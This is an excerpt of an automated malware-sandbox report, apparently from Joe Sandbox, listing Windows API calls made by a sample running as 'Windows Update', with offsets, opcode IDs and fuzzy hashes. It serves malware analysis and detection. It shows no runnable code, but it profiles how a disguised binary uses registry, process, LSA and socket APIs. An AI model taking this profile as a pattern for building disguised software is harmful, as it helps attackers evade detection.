                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message
                                                                                  • String ID:
                                                                                  • API String ID: 2030045667-0
                                                                                  • Opcode ID: dabfcdbc7eca5e8ff5f95596ccfcc709325fc336703b44a4a2400d0cb5bc829f
                                                                                  • Instruction ID: c4e2a37fc80df7ecbca95d4614b1491eaa6daae7450d189f7833e67e287a34af
                                                                                  • Opcode Fuzzy Hash: dabfcdbc7eca5e8ff5f95596ccfcc709325fc336703b44a4a2400d0cb5bc829f
                                                                                  • Instruction Fuzzy Hash: F3415C6554E3C05FE7138B358C65AA2BFB5AF13214B0E84DBD8C4CF2A3D6199849C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 006437C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: 63d23898a0aa0a745c155c9ecf751d82f3ee1862e88177cad84858a642f8662e
                                                                                  • Instruction ID: 1d0c23327bb8a2d6d061bc39764f2e77ec8387bfdc69e912be6b0a43bd8b6c31
                                                                                  • Opcode Fuzzy Hash: 63d23898a0aa0a745c155c9ecf751d82f3ee1862e88177cad84858a642f8662e
                                                                                  • Instruction Fuzzy Hash: FC3181B2504344AFEB22CF60DC44FA7BFACEF05760F04859AF9849B242D665A909CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FormatMessageW.KERNEL32(?,00000E40,?,?), ref: 006433F6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1306739567-0
                                                                                  • Opcode ID: 8395219d947ef305200b91d0a3241063da72ebb9089101a82a2f9f8f87beb126
                                                                                  • Instruction ID: 9634e4342ca709ece3b47cc9ba6677cce3e8b693f53c51ba3f15379f2a7e61be
                                                                                  • Opcode Fuzzy Hash: 8395219d947ef305200b91d0a3241063da72ebb9089101a82a2f9f8f87beb126
                                                                                  • Instruction Fuzzy Hash: 6F316B7150E3C05FD7138B758C61AA6BFB4AF47610F1A80DBD8848F2A3D625691AC7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0011BCA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: d95bb9d6ff6b10e4f8ad2b8cf8b91d22d1bdc7415fb3db2c0382e21a8b60afab
                                                                                  • Instruction ID: 1ef07435c5abc6a73f5eda86507b36a2f2bbd1fdea673a78fb0a72d86a682523
                                                                                  • Opcode Fuzzy Hash: d95bb9d6ff6b10e4f8ad2b8cf8b91d22d1bdc7415fb3db2c0382e21a8b60afab
                                                                                  • Instruction Fuzzy Hash: 633184B1505340AFE722CF25DD45FA2BFE8EF05314F0844AEE9848B152D775A909CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,00000E40), ref: 006469D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 7efb8cb35c0f2dbbe03180d94a275b94d66a172aabcf416be6e091ccafa6b504
                                                                                  • Instruction ID: 06e557c5ae5395186ad78ca21d00574c95ad17fecacfa4052e2ff53d3b75369d
                                                                                  • Opcode Fuzzy Hash: 7efb8cb35c0f2dbbe03180d94a275b94d66a172aabcf416be6e091ccafa6b504
                                                                                  • Instruction Fuzzy Hash: 84318C72200601AFEB21DF55CC81FA6BBA8EB09710F048569FA499A290D6B6E944CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetPerAdapterInfo.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0064319F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdapterInfo
                                                                                  • String ID:
                                                                                  • API String ID: 3405139893-0
                                                                                  • Opcode ID: c983e452097437a1c1b9364baa721fb4dab50fe567bf15a3bc66e89bcea7c27d
                                                                                  • Instruction ID: 9a381d7a0c5da13d828cf68ef27f2d36004773afb9691403134b25eaf8edb51d
                                                                                  • Opcode Fuzzy Hash: c983e452097437a1c1b9364baa721fb4dab50fe567bf15a3bc66e89bcea7c27d
                                                                                  • Instruction Fuzzy Hash: 61316D7540E3C09FE7138B219C55BA6BFB4EF07214F0985DBE9849F1A3D224A909D772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 0064174E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FolderPath
                                                                                  • String ID:
                                                                                  • API String ID: 1514166925-0
                                                                                  • Opcode ID: ed7fe23b55a6d09f1aba8e0bc3e4aefaefd70f4ffda1b41c20121e4833c39297
                                                                                  • Instruction ID: 489ae2c403eb7b0628401efac7cf2f92bfcb7a012d175e4aef42e24d766c0547
                                                                                  • Opcode Fuzzy Hash: ed7fe23b55a6d09f1aba8e0bc3e4aefaefd70f4ffda1b41c20121e4833c39297
                                                                                  • Instruction Fuzzy Hash: 9B315E7540E3C19FD3138B758C65A62BF74EF47610B0E41CBD8848F1A3D225691AC7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0011ABD5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: 1c335259cb30045d18d3029a18e57b184a0c578e920f4be2d1633fe37b240bba
                                                                                  • Instruction ID: c815e9bfa2ef17cc90671994c2e61873fb6afd3275475d46d808dde73625be21
                                                                                  • Opcode Fuzzy Hash: 1c335259cb30045d18d3029a18e57b184a0c578e920f4be2d1633fe37b240bba
                                                                                  • Instruction Fuzzy Hash: A931B472544384AFE722CF11CC45FA7BFACEF06310F0885ABF9858B152D265A949C7B1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 006439BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: e4cd99389f71c872ddcb8ecbe12b2672e585614a3b88b6bfea3a0bd067ca988d
                                                                                  • Instruction ID: 7726ab4ea121feac60c9c07bf35ee8626eeb100212e098620a835cc62b324593
                                                                                  • Opcode Fuzzy Hash: e4cd99389f71c872ddcb8ecbe12b2672e585614a3b88b6bfea3a0bd067ca988d
                                                                                  • Instruction Fuzzy Hash: 3D31A771505384AFE722CF20DC45FA6BFB8EF06350F08849BF9849B253D625A909C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: accept
                                                                                  • String ID:
                                                                                  • API String ID: 3005279540-0
                                                                                  • Opcode ID: 8c1ad11dee47bfdbee74d2f6433b83b266f58e26e3a62a3d13378f42abb505da
                                                                                  • Instruction ID: 6c04afa5f80ca9afd5ef6f63bd87492ff31492bea8ac61fde57155242bf3bb0d
                                                                                  • Opcode Fuzzy Hash: 8c1ad11dee47bfdbee74d2f6433b83b266f58e26e3a62a3d13378f42abb505da
                                                                                  • Instruction Fuzzy Hash: C4318675509384AFE712CB61DC45B96FFB8EF06314F0884DAE9848B253D375A948CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • getnameinfo.WS2_32(?,00000E40), ref: 006432CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getnameinfo
                                                                                  • String ID:
                                                                                  • API String ID: 1866240144-0
                                                                                  • Opcode ID: ce49384661892d5e7c12ca1d5731c876c4fa0e7bcb6e18baa80a57237886d5d5
                                                                                  • Instruction ID: 6d2381d63a4e8f894104dbe839e7ec1b470112674692ec159ea35ba83feda8bb
                                                                                  • Opcode Fuzzy Hash: ce49384661892d5e7c12ca1d5731c876c4fa0e7bcb6e18baa80a57237886d5d5
                                                                                  • Instruction Fuzzy Hash: 2B216F72500204AFFB21DF65CC81FABF7ACEF04710F04896AEA45CA641DA71EA48CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011ACD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: e4369d2ad6b2c3bc1e074246d9a2bb38486ad5ac8b4c35ef2e6ce98421bf53b5
                                                                                  • Instruction ID: f920313a8ba4d2e7152e2af0d04086983c10111576029903686959510e37d725
                                                                                  • Opcode Fuzzy Hash: e4369d2ad6b2c3bc1e074246d9a2bb38486ad5ac8b4c35ef2e6ce98421bf53b5
                                                                                  • Instruction Fuzzy Hash: DE3191751057849FE722CF21DC45FA2BFA8EF06310F08849AE985CB152D364E949CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetProcessTimes.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640BD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessTimes
                                                                                  • String ID:
                                                                                  • API String ID: 1995159646-0
                                                                                  • Opcode ID: 0468a770a30d179dae9f8bf8c67da6e5f273c23df17ed0362014af8839279562
                                                                                  • Instruction ID: 9db65221ff49eb39516176dfca4f784cc84cb9b0237747ab3954f9ec2977486a
                                                                                  • Opcode Fuzzy Hash: 0468a770a30d179dae9f8bf8c67da6e5f273c23df17ed0362014af8839279562
                                                                                  • Instruction Fuzzy Hash: EA31D5B2505380AFE7128F20DC45F96BFB8EF06310F0885DAE984DB193D235A945CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DeleteFileW.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00642E00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: 582321c3ab3903eb2d7b4aec54bb025416b545026c4013234b67efb6c982c467
                                                                                  • Instruction ID: 16ae625c2a1dfed1729c460dda78c92336926a9f6e75b130743dfc87d670162a
                                                                                  • Opcode Fuzzy Hash: 582321c3ab3903eb2d7b4aec54bb025416b545026c4013234b67efb6c982c467
                                                                                  • Instruction Fuzzy Hash: A5315E7150E3C19FD7138B359C65692BFB4EF13214B1A84DBE885CF2A3D2299809C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • gethostname.WS2_32(?,00000E40,?,?), ref: 0011A1BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: gethostname
                                                                                  • String ID:
                                                                                  • API String ID: 144339138-0
                                                                                  • Opcode ID: 48f8bfd5f39b03c25f4fa5d80243c92815bb0c99855d7306538645c104886884
                                                                                  • Instruction ID: d3634789e85535e05752ff326e5f402dfa7f6779847b2702f7f4968a71e572e6
                                                                                  • Opcode Fuzzy Hash: 48f8bfd5f39b03c25f4fa5d80243c92815bb0c99855d7306538645c104886884
                                                                                  • Instruction Fuzzy Hash: 4631A27140D3C06FD3138B358C55BA6BFB4EF47620F0985DBD8848F193D229A909CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011B06C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationToken
                                                                                  • String ID:
                                                                                  • API String ID: 4114910276-0
                                                                                  • Opcode ID: 6a9d2a1ab41d04d688cd67a3ca3565985781ffef09b69c385bdec71745760c1e
                                                                                  • Instruction ID: 3447329a81c1614a6ffa4f7261525b84effc7d3b27b4cb1cfe5ff90cf1d32269
                                                                                  • Opcode Fuzzy Hash: 6a9d2a1ab41d04d688cd67a3ca3565985781ffef09b69c385bdec71745760c1e
                                                                                  • Instruction Fuzzy Hash: 38318475509380AFE712CB21DC45F97BFB8EF06210F0984ABF945CB152D225A948C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • K32EnumProcessModules.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006450E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumModulesProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1082081703-0
                                                                                  • Opcode ID: 501784bc7e7936fccb9c58af5388b45eaa7b7de06f29c32700fab941c3ce2724
                                                                                  • Instruction ID: 2779c6579d5c4356fa104bcfafebaf3cd0255d4265e4dac3abc788c53e8d0892
                                                                                  • Opcode Fuzzy Hash: 501784bc7e7936fccb9c58af5388b45eaa7b7de06f29c32700fab941c3ce2724
                                                                                  • Instruction Fuzzy Hash: 9521B472509780AFEB12CF20DC55F96BFA8EF06310F0884DAE9859B153C665A948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00646622
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CertCertificateChainPolicyVerify
                                                                                  • String ID:
                                                                                  • API String ID: 3930008701-0
                                                                                  • Opcode ID: 6c0c3d23ec3d31be66bdf8944182777e2ca399efea3dc24dd6a895db74275af6
                                                                                  • Instruction ID: 3706ab5e71f418928eea8c984acac19d07e1dc82353368871a6384b9db02ea2d
                                                                                  • Opcode Fuzzy Hash: 6c0c3d23ec3d31be66bdf8944182777e2ca399efea3dc24dd6a895db74275af6
                                                                                  • Instruction Fuzzy Hash: C321B471509380AFE7128F20DC45F96BFB8EF02320F09859BF944DB193D225A949C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LsaOpenPolicy.ADVAPI32(?,00000E40), ref: 0011B38F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: OpenPolicy
                                                                                  • String ID:
                                                                                  • API String ID: 2030686058-0
                                                                                  • Opcode ID: a4a62cc3c9cf99ac6153e98085bca7ea5fd04044b6b9aaa7a29b62f0060af776
                                                                                  • Instruction ID: 3924d48f07caaffe76b9a555a668e44509454eccdc2e1e028b8ab68763ce3c1f
                                                                                  • Opcode Fuzzy Hash: a4a62cc3c9cf99ac6153e98085bca7ea5fd04044b6b9aaa7a29b62f0060af776
                                                                                  • Instruction Fuzzy Hash: E2219E72504384AFE721CF65DC85FAABFB8FF05310F0884AAE9849B152D365A948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateMutexW.KERNEL32(?,?), ref: 00640915
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: fafd9ea13f1d6c68d18d65d0ddc7093dcaba66cbb37eb816a308fba6ff10cba9
                                                                                  • Instruction ID: d97c1ee8c07d7c471a1997da19ce8adf32015af9ad1e4d7d58d2c2b32d2ab6ab
                                                                                  • Opcode Fuzzy Hash: fafd9ea13f1d6c68d18d65d0ddc7093dcaba66cbb37eb816a308fba6ff10cba9
                                                                                  • Instruction Fuzzy Hash: 163152B1505384AFE721CF25CC45F96FFE8EF05310F0884AAE9888B292D375A948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNELBASE(?,00000E40,?,?), ref: 0064138A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileMapping
                                                                                  • String ID:
                                                                                  • API String ID: 524692379-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • getaddrinfo.WS2_32(?,00000E40), ref: 00643D4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getaddrinfo
                                                                                  • String ID:
                                                                                  • API String ID: 300660673-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenCurrentUser.KERNEL32(?,00000E40), ref: 006436BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentOpenUser
                                                                                  • String ID:
                                                                                  • API String ID: 1571386571-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegNotifyChangeKeyValue.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006438C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeNotifyValue
                                                                                  • String ID:
                                                                                  • API String ID: 3933585183-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • K32GetModuleInformation.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0064542E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationModule
                                                                                  • String ID:
                                                                                  • API String ID: 3425974696-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000E40,?,?), ref: 0064553A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName
                                                                                  • String ID:
                                                                                  • API String ID: 514040917-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetAdaptersAddresses.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006430AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdaptersAddresses
                                                                                  • String ID:
                                                                                  • API String ID: 2506852604-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSAEventSelect.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006411C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EventSelect
                                                                                  • String ID:
                                                                                  • API String ID: 31538577-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011BD95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 00640491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMappingOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1680863896-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 006437C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 0011B8BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Socket
                                                                                  • String ID:
                                                                                  • API String ID: 38366605-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RasConnectionNotificationA.RASAPI32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006435E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConnectionNotification
                                                                                  • String ID:
                                                                                  • API String ID: 1402429939-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0011BCA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  Uniqueness

